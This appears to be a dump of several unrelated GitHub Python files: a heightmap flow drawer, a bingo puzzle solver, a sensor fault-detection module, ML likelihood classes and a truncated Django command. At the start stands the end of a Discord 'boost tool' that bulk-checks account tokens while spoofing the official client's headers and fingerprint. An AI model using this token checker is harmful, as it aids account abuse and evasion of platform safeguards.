file)\r\n one_m_locked += 1\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n one_m_used += 1\r\n if len(boost_data.json()) == 0:\r\n removeToken(token, file)\r\n print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n one_m_nonitro += 1\r\n else:\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n\r\n print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n one_m_working += 1\r\n else:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n one_m_invalid += 1\r\n\r\n print(f\"{Fore.GREEN}WORKING (with nitro) : {Fore.WHITE}{three_m_working} | {Fore.RED}USED : {Fore.WHITE}{three_m_used} | {Fore.RED}NO NITRO : {Fore.WHITE}{three_m_nonitro} | {Fore.RED}LOCKED : {Fore.WHITE}{three_m_locked} | {Fore.RED}INVALID : {Fore.WHITE}{three_m_invalid}\")\r\n print(f\"{Fore.GREEN}WORKING (with nitro) : {Fore.WHITE}{one_m_working} | {Fore.RED}USED : {Fore.WHITE}{one_m_used} | {Fore.RED}NO NITRO : {Fore.WHITE}{one_m_nonitro} | {Fore.RED}LOCKED : {Fore.WHITE}{one_m_locked} | {Fore.RED}INVALID : {Fore.WHITE}{one_m_invalid}\")\r\n\r\ndef checkEmpty(file):\r\n mypath = Path(file)\r\n\r\n if mypath.stat().st_size == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef get_super_properties():\r\n properties = '''{\"os\":\"Windows\",\"browser\":\"Chrome\",\"device\":\"\",\"system_locale\":\"en-GB\",\"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"browser_version\":\"95.0.4638.54\",\"os_version\":\"10\",\"referrer\":\"\",\"referring_domain\":\"\",\"referrer_current\":\"\",\"referring_domain_current\":\"\",\"release_channel\":\"stable\",\"client_build_number\":102113,\"client_event_source\":null}'''\r\n properties = base64.b64encode(properties.encode()).decode()\r\n return properties\r\n\r\ndef get_fingerprint(s):\r\n try:\r\n fingerprint = s.get(f\"https://discord.com/api/v9/experiments\", timeout=5).json()[\"fingerprint\"]\r\n return fingerprint\r\n except Exception as e:\r\n return \"Error\"\r\n \r\ndef find_token(token):\r\n if ':' in token:\r\n token_chosen = None\r\n tokensplit = token.split(\":\")\r\n for thing in tokensplit:\r\n if '@' not in thing and '.' in thing and len(\r\n thing) > 30: \r\n token_chosen = thing\r\n break\r\n if token_chosen == None:\r\n print(f\"Error finding token\", Fore.RED)\r\n return None\r\n else:\r\n return token_chosen\r\n\r\n\r\n else:\r\n return token\r\n \r\ndef removeToken(token: str, file:str):\r\n with open(file, \"r\") as f:\r\n fulltokens = f.read().splitlines()\r\n Tokens = []\r\n for j in fulltokens:\r\n p = find_token(j)\r\n Tokens.append(p)\r\n for t in Tokens:\r\n if len(t) < 5 or t == token:\r\n Tokens.remove(t)\r\n open(file, \"w\").write(\"\\n\".join(Tokens))\r\n\r\ndef validate_token(s, headers):\r\n check = s.get(f\"https://discord.com/api/v9/users/@me\", headers=headers)\r\n if check.status_code == 200:\r\n profile_name = check.json()[\"username\"]\r\n profile_discrim = check.json()[\"discriminator\"]\r\n profile_of_user = f\"{profile_name}#{profile_discrim}\"\r\n return profile_of_user\r\n else:\r\n return False\r\n \r\ndef checktoken(token, file):\r\n s, headers = get_headers(token)\r\n profile = validate_token(s, headers)\r\n\r\n if profile != False:\r\n\r\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n\r\n if boost_data.status_code == 403:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n return False\r\n\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n return False\r\n\r\n if len(boost_data.json()) == 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n return False\r\n\r\n else:\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n return True\r\n\r\n else:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n return False\r\n \r\ndef get_headers(token):\r\n while True:\r\n s = httpx.Client()\r\n dcf, sdc = get_cookies(s, \"https://discord.com/\")\r\n fingerprint = get_fingerprint(s)\r\n if fingerprint != \"Error\":\r\n break\r\n super_properties = get_super_properties()\r\n headers = {\r\n 'authority': 'discord.com',\r\n 'method': 'POST',\r\n 'path': '/api/v9/users/@me/channels',\r\n 'scheme': 'https',\r\n 'accept': '*/*',\r\n 'accept-encoding': 'gzip, deflate',\r\n 'accept-language': 'en-US',\r\n 'authorization': token,\r\n 'cookie': f'__dcfduid={dcf}; __sdcfduid={sdc}',\r\n 'origin': 'https://discord.com',\r\n 'sec-ch-ua': '\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\r\n 'sec-ch-ua-mobile': '?0',\r\n 'sec-ch-ua-platform': '\"Windows\"',\r\n 'sec-fetch-dest': 'empty',\r\n 'sec-fetch-mode': 'cors',\r\n 'sec-fetch-site': 'same-origin',\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',\r\n 'x-debug-options': 'bugReporterEnabled',\r\n 'x-fingerprint': fingerprint,\r\n 'x-super-properties': super_properties,\r\n }\r\n return s, headers\r\n\r\ndef get_cookies(s, url):\r\n try:\r\n cookieinfo = s.get(url, timeout=5).cookies\r\n dcf = str(cookieinfo).split('__dcfduid=')[1].split(' ')[0]\r\n sdc = str(cookieinfo).split('__sdcfduid=')[1].split(' ')[0]\r\n return dcf, sdc\r\n except:\r\n return \"\", \"\"\r\n \r\ndef printwatermark():\r\n print(Fore.MAGENTA + f'''\r\n\r\n █████╗ ██╗ ██╗██╗ ██╗██╗███████╗ ''' + Fore.LIGHTMAGENTA_EX + ''' ██████╗ ██████╗ ██████╗ ███████╗████████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗\r\n██╔══██╗██║ ██║██║ ██║██║██╔════╝ ██╔══██╗██╔═══██╗██╔═══██╗██╔════╝╚══██╔══╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║\r\n███████║██║ ██║██║ █╗ ██║██║███████╗ ██████╔╝██║ ██║██║ ██║███████╗''' + Fore.MAGENTA +''' ██║ ██║ ██║ ██║██║ ██║██║ ██║\r\n██╔══██║██║ ██║██║███╗██║██║╚════██║ ''' + Fore.LIGHTMAGENTA_EX + ''' ██╔══██╗██║ ██║██║ ██║╚════██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═╝\r\n██║ ██║╚██████╔╝╚███╔███╔╝██║███████║ ██████╔╝╚██████╔╝╚██████╔╝███████║ ██║ ██║ ╚██████╔╝╚██████╔╝███████╗██╗\r\n╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝ ''' + Fore.MAGENTA + ''' ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝\r\n discord.gg/omari\r\n https://github.com/auwii\r\n made by conspiracy#0002/conspiracy#0001 \r\n ''')\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n cls()\r\n cls()\r\n colorama.init()\r\n \r\n mainmenu()\r\n","repo_name":"conspiracylol/discord-boost-tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43049865053","text":"from PIL import Image, ImageDraw\nimport math\nimport random\n\ndebug = False\nstatus = True\nflows = 32\nradius = 16\nsweep = 8\nsteps = 512\n\nim = Image.open(\"Heightmap.png\")\nim = im.convert(\"RGB\")\nwidth, height = im.size\n\n# we need to generate a list of U,V tuples to pass to the drawing board\ndraw = ImageDraw.Draw(im)\n\nfor q in range(0,flows):\n startUV = (int(random.random()*width),int(random.random()*height))\n listUV = [startUV]\n validUV = True\n \n if status:\n print(\"Path: \" + str(q+1) + \"/\" + str(flows))\n \n valTemp = 255\n \n for j in range(0,steps):\n for i in range(0,sweep):\n angle = i * ((2 * math.pi)/sweep)\n\n uCoord = int(startUV[0] + radius * math.cos(angle))\n vCoord = int(startUV[1] + radius * math.sin(angle))\n \n # DEBUG\n if debug:\n print(\"U: \" + str(uCoord))\n print(\"V: \" + str(vCoord))\n \n # make sure to only use the coordinates if they're in the image's dimensions\n if (0 < uCoord < width) and (0 < vCoord < height):\n\n hVal = im.getpixel((uCoord,vCoord))[0]\n\n # if hval < valTemp, write hval to valTemp and assign coords to locUV\n if (hVal < valTemp):\n valTemp = hVal\n startUV = (uCoord,vCoord)\n \n # confirm UV as valid\n validUV = True\n else:\n validUV = False\n radius += radius\n\n # export the chosen coordinate to the list ONLY if UV is valid\n if validUV:\n listUV.append(startUV)\n\n #draw.line(listUV, fill=(0,0,255), width = 1)\n #draw.point(listUV, fill=(255,255,255))\n \n # draw the gradient line\n for index, span in enumerate(listUV):\n if (index < len(listUV)) and (index != 0):\n draw.line((listUV[index],listUV[index-1]), fill=(0,index,255), width = 4)\n\ndel draw\n\n# write to stdout\nim.save(\"output\", \"PNG\")\nim.show()","repo_name":"skyeterran/Flowmarch","sub_path":"flowmarch.py","file_name":"flowmarch.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16064247218","text":"class NumberOnBoard:\n left = None\n above = None\n right = None\n below = None\n marked = False\n\n def __init__(self, number, left=None, above=None):\n self.number = number\n self.left = left\n self.above = above\n\n def add_right(self, right):\n self.right = right\n\n def add_below(self, below):\n self.below = below\n\n def mark(self):\n self.marked = True\n\n def is_not_marked(self):\n return self.marked is False\n\n def get_adjacent_marks(self, only_in_direction: str = None):\n def should_count_as_marked(number: 'NumberOnBoard', direction: str):\n is_direction_match = only_in_direction is None or only_in_direction == direction\n return number is not None and is_direction_match and number.marked\n\n if should_count_as_marked(self.left, 'left'):\n yield self.left, 'left'\n if should_count_as_marked(self.above, 'above'):\n yield self.above, 'above'\n if should_count_as_marked(self.right, 'right'):\n yield self.right, 'right'\n if should_count_as_marked(self.below, 'below'):\n yield self.below, 'below'\n\n\ndef flat_map(xs: list[dict[int, NumberOnBoard]]):\n flattened: [NumberOnBoard] = []\n for ys in xs:\n for y in ys.items():\n flattened.append(y[1])\n return flattened\n\n\ndef get_numbers_from_line(line, separator):\n numbers_raw = line \\\n .rstrip('\\r') \\\n .rstrip('\\n') \\\n .split(separator)\n without_empties = list(filter(lambda n: n != '', numbers_raw))\n return list(map(lambda n: int(n), without_empties))\n\n\ndef get_numbers_on_board(puzzle_input):\n numbers_on_board: list[dict[int, NumberOnBoard]] = []\n for row_number in range(0, 5):\n numbers_in_row = get_numbers_from_line(puzzle_input.readline(), ' ')\n\n numbers_on_board.append({})\n current_row = numbers_on_board[row_number]\n\n for column_number in range(0, len(numbers_in_row)):\n current_number = numbers_in_row[column_number]\n current_row[column_number] = NumberOnBoard(\n current_number,\n None if column_number == 0 else current_row[column_number - 1],\n None if row_number == 0 else numbers_on_board[row_number - 1][column_number])\n if column_number > 0:\n current_row[column_number - 1].right = current_row[column_number]\n if row_number > 0:\n numbers_on_board[row_number - 1][column_number].below = current_row[column_number]\n\n return flat_map(numbers_on_board)\n\n\ndef makes_bingo(number: NumberOnBoard):\n def count_marks_in_direction(current_number, only_in_direction, mark_count=0):\n for adjacent, direction in current_number.get_adjacent_marks(only_in_direction):\n return count_marks_in_direction(adjacent, direction, mark_count + 1)\n return mark_count\n\n horizontal_marks = count_marks_in_direction(number, 'left') + count_marks_in_direction(number, 'right') + 1\n vertical_marks = count_marks_in_direction(number, 'above') + count_marks_in_direction(number, 'below') + 1\n return horizontal_marks == 5 or vertical_marks == 5\n\n\ndef get_score_for_board(numbers_on_board: [NumberOnBoard], random_numbers: [int]):\n numbers_needed = 0\n for random_number in random_numbers:\n numbers_needed += 1\n matching_numbers = filter(lambda n: n.number == random_number, numbers_on_board)\n for matching_number in matching_numbers:\n matching_number.mark()\n if makes_bingo(matching_number):\n unmarked = list(map(lambda n: n.number, filter(lambda n: n.is_not_marked(), numbers_on_board)))\n return sum(unmarked) * matching_number.number, numbers_needed\n\n\ndef print_board(numbers_on_board):\n for index in range(0, len(numbers_on_board)):\n if (index % 5) == 0:\n print('\\n')\n number = numbers_on_board[index]\n print(number.number if number.is_not_marked() else 'X', end='')\n print('\\t', end='')\n print('\\n')\n\n\ndef main():\n puzzle_input = open(\"inputs/04.txt\", \"r\")\n random_numbers = get_numbers_from_line(puzzle_input.readline(), ',')\n\n lowest_numbers_needed = 9000\n the_fastest_score = -1\n most_numbers_needed = -1\n the_slowest_score = -1\n\n while puzzle_input.readline() != '':\n numbers_on_board = get_numbers_on_board(puzzle_input)\n\n score, numbers_needed = get_score_for_board(numbers_on_board, random_numbers)\n print_board(numbers_on_board)\n print(f\"Needed {numbers_needed} numbers to get score of {score}\")\n\n if lowest_numbers_needed > numbers_needed:\n lowest_numbers_needed = numbers_needed\n the_fastest_score = score\n if most_numbers_needed < numbers_needed:\n most_numbers_needed = numbers_needed\n the_slowest_score = score\n\n print(\"\\n\\n\\n\")\n print(\"***********************************************************************************************\")\n print(f\"Least amount of numbers needed was {lowest_numbers_needed} to get score of {the_fastest_score}\")\n print(f\"Most amount of numbers needed was {most_numbers_needed} to get score of {the_slowest_score}\")\n print(\"***********************************************************************************************\")\n\n\nmain()\n","repo_name":"vincentspaa/advent-of-code","sub_path":"python/2021/puzzle_4.py","file_name":"puzzle_4.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10668865975","text":"from classify_fault.__init__ import *\nfrom classify_fault.check_boundary import detect_out_of_bounds\nfrom classify_fault.check_drift import detect_drift\nfrom classify_fault.check_frozen import detect_frozen\nfrom classify_fault.check_dynamics import detect_dynamics\nfrom classify_fault.utils.get_value_in_dict import get_value\nfrom classify_fault.set_config import update_config, set_boundary, load_config\n\ndef detect_fault(data, tracking_size, type_to_check=None, \n frozen_threshold=None, boundary_limits=None, \n dynamic_threshold=None, drift_params=None,\n tag=None, config_path:str=None,\n boundary_type='fix'):\n # Set Parameter\n results, updates = {}, {}\n\n # load config\n if config_path is not None:\n config = load_config(json_file_path=config_path)\n else:\n config = None\n\n # Perform fault detection\n fault_detection = perform_fault_detection(data, tracking_size, config=config,\n type_to_check=type_to_check, \n frozen_threshold=frozen_threshold, boundary_limits=boundary_limits, \n dynamic_threshold=dynamic_threshold, drift_params=drift_params,\n tag=tag, boundary_type=boundary_type)\n # Gather results and updates\n # results[tag] = fault_detection\n updates[tag] = {\"drift_params\": fault_detection[\"drift_params_update\"], \n \"statistic\": fault_detection[\"statistics_update\"], \n \"boundary_limits\": fault_detection[\"boundary_limits_update\"]}\n\n # Update Configuration\n if config_path is not None and config is not None:\n update_config(config_path=config_path, updates=updates)\n \n return fault_detection\n\n\ndef detect_faults(data, tag_list:list, config_path='./config/variable_config.json'):\n # data 유효성 검사\n if not isinstance(data, (np.ndarray, pd.DataFrame)):\n raise TypeError(\"Data Should be Numpy ndarray or DataFrame\")\n else:\n if isinstance(data, pd.DataFrame) and tag_list is None:\n tag_list = data.columns.to_list()\n data = data.values\n\n # data shape 검사\n if data.ndim == 1:\n warnings.warn(\"For one tag, use the 'detect_fault' function.\", UserWarning)\n\n # tag_list 유효성 검사\n if not isinstance(tag_list, (list, tuple)):\n raise TypeError(\"tag list should be list. ex) tag_list=['tag01', 'tag2', ..., 'tag10']\")\n if isinstance(tag_list, tuple):\n warnings.warn(\"Tag ListPlease use the tag list as a list, not as a tuple.\", UserWarning)\n tag_list = list(tag_list) \n \n # Set Parameter\n results, updates = {}, {}\n\n # config_path 읽기\n config = load_config(json_file_path=config_path)\n\n for i, tag in enumerate(tag_list):\n # 필요 파라미터 읽기\n tracking_size = config[tag]['tracking_size']\n type_to_check = config[tag]['type_to_check']\n frozen_threshold = config[tag]['frozen_threshold']\n boundary_limits = config[tag]['boundary_limits']\n dynamic_threshold = config[tag]['dynamic_threshold']\n drift_params = config[tag]['drift_params']\n boundary_type = config[tag]['statistic']['boundary_type']\n\n target = data[:, i]\n\n fault_detection = perform_fault_detection(data=target, tracking_size=tracking_size, config=config,\n type_to_check=type_to_check,\n frozen_threshold=frozen_threshold, boundary_limits=boundary_limits, \n dynamic_threshold=dynamic_threshold, drift_params=drift_params,\n tag=tag, boundary_type=boundary_type)\n # Gather results and updates\n results[tag] = fault_detection\n updates[tag] = {\"drift_params\": fault_detection[\"drift_params_update\"], \n \"statistic\": fault_detection[\"statistics_update\"], \n \"boundary_limits\": fault_detection[\"boundary_limits_update\"]}\n \n # Update Configuration for all tags at once\n update_config(config_path=config_path, updates=updates)\n\n return results \n\n\ndef perform_fault_detection(data, tracking_size, config=None, \n type_to_check=None, \n frozen_threshold=None, boundary_limits=None, \n dynamic_threshold=None, drift_params=None,\n tag=None, boundary_type='fix'):\n fault_detected = False\n values = {\"frozen\": None, \"boundary\": None, \"dynamics\": None, \"drift\": None}\n frozen_detected, boundary_detected, dynamic_detected, drift_detected = False, False, False, False\n\n if type_to_check is None:\n type_to_check = {\"frozen\": True, \"boundary\": True, \"dynamics\": True, \"drift\": True}\n\n if tracking_size == 0:\n type_to_check = {\"frozen\": False, \"boundary\": True, \"dynamics\": False, \"drift\": True}\n\n try:\n # Frozen Test\n if type_to_check.get(\"frozen\"):\n frozen_detected, avg_diff = detect_frozen(data, frozen_threshold, tracking_size)\n values['frozen'] = avg_diff\n if frozen_detected:\n fault_detected = True\n\n # Boundary Test\n boundary_limits_update, statistics_update = None, None\n\n if type_to_check.get(\"boundary\"):\n x = data[-1] # 가장 최근 데이터\n high, low = boundary_limits['high'], boundary_limits['low']\n\n result = detect_out_of_bounds(x, high, low)\n boundary_detected = result[\"result\"][0]\n values['boundary'] = result['result']\n if boundary_detected:\n fault_detected = True\n\n if 'moving' in boundary_type.lower():\n statistics_update, boundary_limits_update = {}, {}\n statistics = config[tag]['statistic']\n high_updated, low_updated, avg_updated, std_updated, tracked_size = set_boundary(statistics=statistics, \n x=data[-1], \n boundary_type='moving')['result']\n boundary_limits_update['high'] = high_updated\n boundary_limits_update['low'] = low_updated\n statistics_update['mean'] = avg_updated\n statistics_update['std'] = std_updated\n statistics_update['max'], statistics_update['min'] = max(max(data), statistics['max']), min(min(data), statistics['min'])\n statistics_update['oldest_value'] = data[0]\n statistics_update['boundary_type'] = 'moving'\n statistics_update['tracked_size'] = tracked_size\n\n # Dynamic Test\n if type_to_check.get(\"dynamics\"):\n dynamic_detected, avg_diff = detect_dynamics(data=data, dynamic_threshold=dynamic_threshold)\n values['dynamics'] = avg_diff\n if dynamic_detected:\n fault_detected = True\n\n # Drift Test\n if type_to_check.get(\"drift\"):\n data_point = data[-1] # 가장 최근 데이터\n average, cusum_threshold, ewma_alpha = drift_params['average'], drift_params['cusum_threshold'], drift_params['ewma_alpha']\n \n cusum_plus_init = get_value(dictionary=drift_params, key='cusum_plus', default_value=0)\n cusum_minus_init = get_value(dictionary=drift_params, key='cusum_minus', default_value=0)\n result = detect_drift(data_point=data_point, average=average, cusum_threshold=cusum_threshold, ewma_alpha=ewma_alpha,\n C_plus=cusum_plus_init, C_minus=cusum_minus_init)\n\n cusum_plus=get_value(dictionary=result['CUSUM'], key='C_plus', default_value=0)\n cusum_minus=get_value(dictionary=result['CUSUM'], key='C_minus', default_value=0)\n ewma_smoothed=get_value(dictionary=result['EWMA'], key='smoothed_data', default_value=0)\n\n drift_params_update = {\"cusum_plus\": cusum_plus, \n \"cusum_minus\": cusum_minus,\n \"ewma_smoothed\": ewma_smoothed}\n # Update Values Dictionary\n values['drift'] = [cusum_plus, cusum_minus]\n # if result[\"CUSUM\"][\"detected\"] or result[\"EWMA\"][\"detected\"]:\n if result[\"CUSUM\"][\"detected\"]:\n drift_detected = True\n fault_detected = True\n else:\n drift_params_update = None\n \n success = True\n message = \"-\"\n\n except Exception as E:\n success = True\n message = f\"{E},\\n {traceback.format_exc()}\"\n\n fault_detection = {\"success\": success,\n \"values\": values,\n \"fault_detected\": fault_detected,\n \"Frozen\": frozen_detected,\n \"Boundary\": boundary_detected,\n \"Dynamics\": dynamic_detected,\n \"Drift\": drift_detected,\n \"statistics_update\": statistics_update,\n \"boundary_limits_update\": boundary_limits_update,\n \"drift_params_update\": drift_params_update,\n \"message\": message}\n \n return fault_detection","repo_name":"Kyuhan1230/univariate-fault-detection","sub_path":"classify_fault/fault_detection.py","file_name":"fault_detection.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11451978600","text":"\"\"\"Non-negative integrands -- synthetic or real ML likelihoods.\"\"\"\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport gpflow\nfrom gpflow import default_float\n\n\nclass GaussianMixtureSyntheticLikelihood():\n \"\"\"Synthetic likelihood built using a GMM.\"\"\"\n\n def __init__(self, dimension: int = 1, seed: int = None) -> None:\n \"\"\"Initialise. self.integral_value assumes integration against\n uniform measure on unit hypercube.\n \"\"\"\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n num_components = np.random.randint(5, 14)\n means = np.random.rand(num_components, dimension).tolist()\n scales = (np.random.randint(\n 11, 19, size=(num_components, dimension)\n ) / 100).tolist()\n weights = np.random.dirichlet(np.ones(num_components)).tolist()\n self.weights = tf.constant(weights, dtype=default_float())\n self.means = tf.constant(means, dtype=default_float())\n self.scales = tf.constant(scales, dtype=default_float())\n # Weighted sum of the integrals for each Gaussian.\n dists = tfp.distributions.Normal(self.means, self.scales)\n cdf_diffs = dists.cdf(tf.ones_like(self.means)) - dists.cdf(tf.zeros_like(self.means))\n self.integral_value = tf.math.reduce_sum(self.weights * tf.math.reduce_prod(cdf_diffs, -1))\n \n def posterior_samples(self, num_samples: int, sample_factor: int = 16) -> tf.Tensor:\n indices = tfp.distributions.Categorical(probs=self.weights).sample(num_samples)\n indices = tf.sort(indices) # So count order is correct\n _, _, counts = tf.unique_with_counts(indices)\n samples = []\n for i, (m, s) in enumerate(zip(self.means, self.scales)):\n samples.append(tfp.distributions.TruncatedNormal(\n m, s, tf.zeros_like(m), tf.ones_like(m)\n ).sample(counts[i]))\n return tf.concat(samples, 0)\n\n def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n \"\"\"Likelihood value at x.\n \n :param x: Query locations, shape [N, D].\n :return: The likelihood values at x, shape [N, 1].\n \"\"\"\n if len(x.shape) < 2:\n x = tf.reshape(x, (1, -1))\n dists = tfp.distributions.Normal(self.means, self.scales)\n weighted_log_probs = (\n tf.reduce_sum(dists.log_prob(tf.expand_dims(x, 1)), -1) + tf.math.log(self.weights)\n )\n log_lik = tf.math.reduce_logsumexp(weighted_log_probs, axis=-1, keepdims=True)\n if return_log:\n return log_lik\n else:\n return tf.exp(log_lik)\n\n\nclass BayesianLogisticRegressionLikelihood():\n \"\"\"Likelihood for a Bayesian Logistic Regression model.\"\"\"\n\n def __init__(\n self,\n prior: tfp.distributions.Distribution,\n train_inputs: tf.Tensor = None,\n train_targets: tf.Tensor = None,\n dimension: int = None,\n num_data: int = 1000,\n seed: int = None,\n num_mc_samples: int = 10000,\n integral_value: float = None,\n log_shift: float = 0.0\n ) -> None:\n \"\"\"Initialise. self.integral_value assumes integration against\n a uniform measure on unit hypercube (shifted to be centred on the\n origin).\n \"\"\"\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n # prior = tfp.distributions.Uniform(\n # low=tf.cast([-0.5] * dimension, tf.float64),\n # high=tf.cast([0.5] * dimension, tf.float64)\n # )\n if train_inputs is None:\n if dimension is None:\n raise TypeError('One of train_inputs or dimension must be specified.')\n self.weights = tf.expand_dims(prior.sample(), -1) # [D, 1]\n self.train_inputs = tf.random.normal((num_data, dimension), dtype=default_float()) # [N, D]\n bernoulli_logits = self.train_inputs @ self.weights # [N, 1]\n # [N, 1]\n self.train_targets = tfp.distributions.Bernoulli(logits=bernoulli_logits).sample() \n else:\n self.train_inputs = train_inputs\n self.train_targets = train_targets\n if integral_value is None:\n for i in range(num_mc_samples):\n mc_samples = prior.sample(num_mc_samples)\n integral_value = self(mc_samples).mean().item()\n self.integral_value = integral_value\n self.log_shift = log_shift\n \n def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n \"\"\"Likelihood value at x.\n \n :param x: Query locations, shape [M, D].\n :return: The likelihood values at x, shape [M, 1].\n \"\"\"\n if len(x.shape) < 2:\n x = tf.reshape(x, (1, -1))\n logits = tf.squeeze(tf.linalg.matmul(\n tf.expand_dims(self.train_inputs, 0), # [1, N, D]\n tf.expand_dims(x, -1) # [M, D, 1]\n ), -1) # [M, N]\n dist = tfp.distributions.Bernoulli(logits=logits)\n # [M]\n log_lik = tf.reduce_sum(dist.log_prob(self.train_targets[:, 0]), axis=-1, keepdims=True) - self.log_shift\n if return_log:\n return log_lik\n else:\n return tf.exp(log_lik)\n\n\nclass GaussianProcessRegressionLikelihood():\n \"\"\"Likelihood for a Gaussian Process Regression model.\"\"\"\n\n def __init__(\n self,\n prior: tfp.distributions.Distribution,\n train_inputs: tf.Tensor = None,\n train_targets: tf.Tensor = None,\n dimension: int = None,\n num_data: int = 100,\n seed: int = None,\n num_mc_samples: int = 10000,\n integral_value: float = None,\n log_shift: float = 0.0\n ) -> None:\n \"\"\"Initialise. self.integral_value assumes integration against\n a uniform measure on the unit hypercube.\n \"\"\"\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n # prior = tfp.distributions.Uniform(\n # low=tf.cast([1.0, 0.01] + [1e-6] * dimension, tf.float64),\n # high=tf.cast([10.0, 0.1] + [1.0] * dimension, tf.float64)\n # )\n kernel = gpflow.kernels.Matern12(lengthscales=tf.ones(dimension, dtype=default_float()))\n if train_inputs is None:\n if dimension is None:\n raise TypeError('One of train_inputs or dimension must be specified.')\n # [signal_variance, noise_variance, lengthscales]\n self.hyperparameters = self.prior.sample()\n # [N, D]\n self.train_inputs = tf.random.normal((num_data, dimension), dtype=default_float())\n kernel.variance.assign(self.hyperparameters[0])\n kernel.lengthscales.assign(self.hyperparameters[2:])\n covar = kernel(self.train_inputs) + self.hyperparameters[1] * tf.eye(\n num_data, dtype=default_float()\n )\n self.train_targets = tf.expand_dims(tfp.distributions.MultivariateNormalFullCovariance(\n loc=tf.zeros(num_data, dtype=default_float()), covariance_matrix=covar\n ).sample(), -1)\n else:\n self.hyperparameters = None\n self.train_inputs = train_inputs\n self.train_targets = train_targets\n self.model = gpflow.models.GPR((self.train_inputs, self.train_targets), kernel=kernel)\n if self.hyperparameters is not None:\n self.model.likelihood.variance.assign(self.hyperparameters[1])\n if integral_value is None:\n for i in range(num_mc_samples):\n mc_samples = prior.sample(num_mc_samples)\n integral_value = self(mc_samples).mean().item()\n self.integral_value = integral_value\n self.log_shift = log_shift\n \n def __call__(self, x: tf.Tensor, return_log: bool = False) -> tf.Tensor:\n \"\"\"Likelihood value at x.\n \n :param x: Query locations, shape [N, D].\n :return: The likelihood values at x, shape [N, 1].\n \"\"\"\n if len(x.shape) < 2:\n x = tf.reshape(x, (1, -1))\n lmls = []\n for xi in x:\n self.model.kernel.variance.assign(xi[0])\n self.model.kernel.lengthscales.assign(xi[2:])\n self.model.likelihood.variance.assign(xi[1])\n lmls.append(self.model.log_marginal_likelihood())\n log_lik = tf.reshape(lmls, (-1, 1)) - self.log_shift\n if return_log:\n return log_lik\n else:\n return tf.exp(log_lik)\n","repo_name":"saadhamidml/piflow","sub_path":"piflow/objectives/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34409659863","text":"from django.core.management import BaseCommand\nfrom django.contrib.auth.models import Group, Permission\nfrom django.contrib.contenttypes.models import ContentType\nfrom users.models import User\nfrom mail.models import Mailing, SettingMail, Client\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **kwargs):\n new_group, created = 